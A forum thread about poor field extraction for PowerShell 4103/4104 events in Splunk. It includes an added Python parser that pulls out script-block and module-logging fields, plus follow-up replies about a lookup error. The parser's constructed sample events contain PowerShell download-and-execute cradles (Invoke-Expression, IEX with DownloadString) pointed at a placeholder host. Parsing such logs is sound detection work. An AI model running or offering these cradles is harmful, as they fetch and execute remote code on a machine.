This was VERY helpful - thanks!! I'm finding that the data Splunk ingests for PowerShell events (i.e. 4103, 4104) is very sloppy. Fields are not getting extracted, etc. Any idea on how I can resolve this? There doesn't seem to be a proper "Splunk_TA_PowerShell" with props.conf & transforms.conf to clean up the PowerShell event data - am I wrong? Let me know if you know of a solution, or a good resource. Thanks!
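An added example of the kind of field extraction the question above asks about; it is not code from the thread, from Splunk, or from any Splunk TA. It is written in Python so it runs offline: the regexes pull the fields a 4103 (module logging) and 4104 (script block logging) message carry, and the 4104 handler reassembles script blocks that Windows split into "(N of M)" parts by ScriptBlock ID. The sample events are constructed, and the field names (ScriptBlockText, ScriptBlockId, CommandName, ...) are my own choice, not a field list from any TA.

```python
import re
from collections import defaultdict

# Constructed sample events (not captures from the poster's environment).
# The layout follows the message text Windows writes for 4104 and 4103.
SAMPLE_4104 = (
    "Creating Scriptblock text (1 of 1):\r\n"
    "Invoke-WebRequest -Uri http://example.invalid/p.ps1 | Invoke-Expression\r\n"
    "\r\n"
    "ScriptBlock ID: 3b1d5c4e-7f2a-4c8e-9a1b-2d3e4f5a6b7c\r\n"
    "Path: C:\\Users\\alice\\run.ps1"
)
SAMPLE_4103 = (
    'CommandInvocation(Invoke-WebRequest): "Invoke-WebRequest"\r\n'
    'ParameterBinding(Invoke-WebRequest): name="Uri"; '
    'value="http://example.invalid/p.ps1"\r\n'
    "\r\n"
    "Context:\r\n"
    "        Severity = Informational\r\n"
    "        Host Name = ConsoleHost\r\n"
    "        User = CORP\\alice\r\n"
    "        Script Name = C:\\Users\\alice\\run.ps1\r\n"
)
# A script block logged in two parts (constructed); Path is empty for
# interactively entered blocks, which the regex tolerates.
SBID = "aaaa1111-0000-4000-8000-000000000001"
MULTIPART_4104 = [
    (4104, "Creating Scriptblock text (1 of 2):\r\n$u = 'http://example.invalid/p.ps1';"
           "\r\n\r\nScriptBlock ID: " + SBID + "\r\nPath: "),
    (4104, "Creating Scriptblock text (2 of 2):\r\n IEX (New-Object Net.WebClient)"
           ".DownloadString($u)\r\n\r\nScriptBlock ID: " + SBID + "\r\nPath: "),
]

# Field names are an assumption of this example, not Splunk's.
RE_4104 = re.compile(
    r"Creating Scriptblock text \((?P<part>\d+) of (?P<total>\d+)\):\s*"
    r"(?P<ScriptBlockText>.*?)\s*"
    r"ScriptBlock ID:\s*(?P<ScriptBlockId>[0-9A-Fa-f-]+)"
    r"(?:\s*Path:\s*(?P<Path>[^\r\n]*))?",
    re.DOTALL,
)
RE_4103_CMD = re.compile(r"CommandInvocation\((?P<cmd>[^)]+)\):")
RE_4103_PARAM = re.compile(
    r'ParameterBinding\([^)]+\): name="(?P<name>[^"]*)"; value="(?P<value>[^"]*)"'
)
# One "Key = value" line of the Context block; [ \t]* keeps it on one line.
RE_4103_CTX = re.compile(r"^[ \t]*(?P<key>[A-Za-z ]+?) = (?P<value>.*?)\s*$", re.MULTILINE)


def parse_4104(message):
    """Fields for one 4104 event, or {} if the message does not fit the layout."""
    m = RE_4104.search(message)
    if not m:
        return {}
    fields = {k: v for k, v in m.groupdict().items() if v is not None}
    fields["part"] = int(fields["part"])
    fields["total"] = int(fields["total"])
    return fields


def parse_4103(message):
    """Fields for one 4103 event: invoked command, bound parameters, Context block."""
    fields = {}
    m = RE_4103_CMD.search(message)
    if m:
        fields["CommandName"] = m.group("cmd")
    params = {p.group("name"): p.group("value") for p in RE_4103_PARAM.finditer(message)}
    if params:
        fields["Parameters"] = params
    for c in RE_4103_CTX.finditer(message):
        fields[c.group("key").replace(" ", "")] = c.group("value")   # "Host Name" -> HostName
    return fields


def extract_fields(event_code, message):
    """Dispatch on EventCode, as a per-code props.conf stanza would."""
    if event_code == 4104:
        return parse_4104(message)
    if event_code == 4103:
        return parse_4103(message)
    return {}


def reassemble_script_blocks(events):
    """Join multi-part 4104 events back into whole scripts keyed by ScriptBlockId.
    Only complete sets (all M of M parts seen) are returned; whitespace at the
    chunk boundary is lost because the regex trims each part."""
    parts = defaultdict(dict)
    for code, msg in events:
        f = extract_fields(code, msg)
        if code == 4104 and f:
            parts[f["ScriptBlockId"]][f["part"]] = (f["total"], f["ScriptBlockText"])
    scripts = {}
    for sbid, chunks in parts.items():
        total = next(iter(chunks.values()))[0]
        if len(chunks) == total and all(i in chunks for i in range(1, total + 1)):
            scripts[sbid] = "".join(chunks[i][1] for i in range(1, total + 1))
    return scripts


if __name__ == "__main__":
    for code, msg in [(4104, SAMPLE_4104), (4103, SAMPLE_4103)]:
        print(code, extract_fields(code, msg))
    print(reassemble_script_blocks(MULTIPART_4104))
```

The same named-group regexes are the kind of thing an `EXTRACT-` line in props.conf would carry for the PowerShell/Operational source, with Splunk's `(?<name>...)` group syntax instead of Python's `(?P<name>...)`; trying them in search with `| rex` on a handful of real events first is the quickest way to confirm the message layout before committing them to the TA. Reassembling multi-part 4104 blocks at search time means grouping on the ScriptBlock ID field, which is why extracting it reliably matters more than it first looks.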
This is still an issue, and it looks like the "[eventcode]" trick you mentioned is already present in my transforms.conf file.
I'm using v1.3.4
Anyone else still experiencing this issue?
From the search log:
ERROR LookupDataProvider - Could not find all of the specified destination fields in the lookup table.
ERROR AutoLookupDriver - Could not load lookup='LOOKUP-eventcode' reason='Error in 'lookup' command: Could not find all of the specified destination fields in the lookup table.'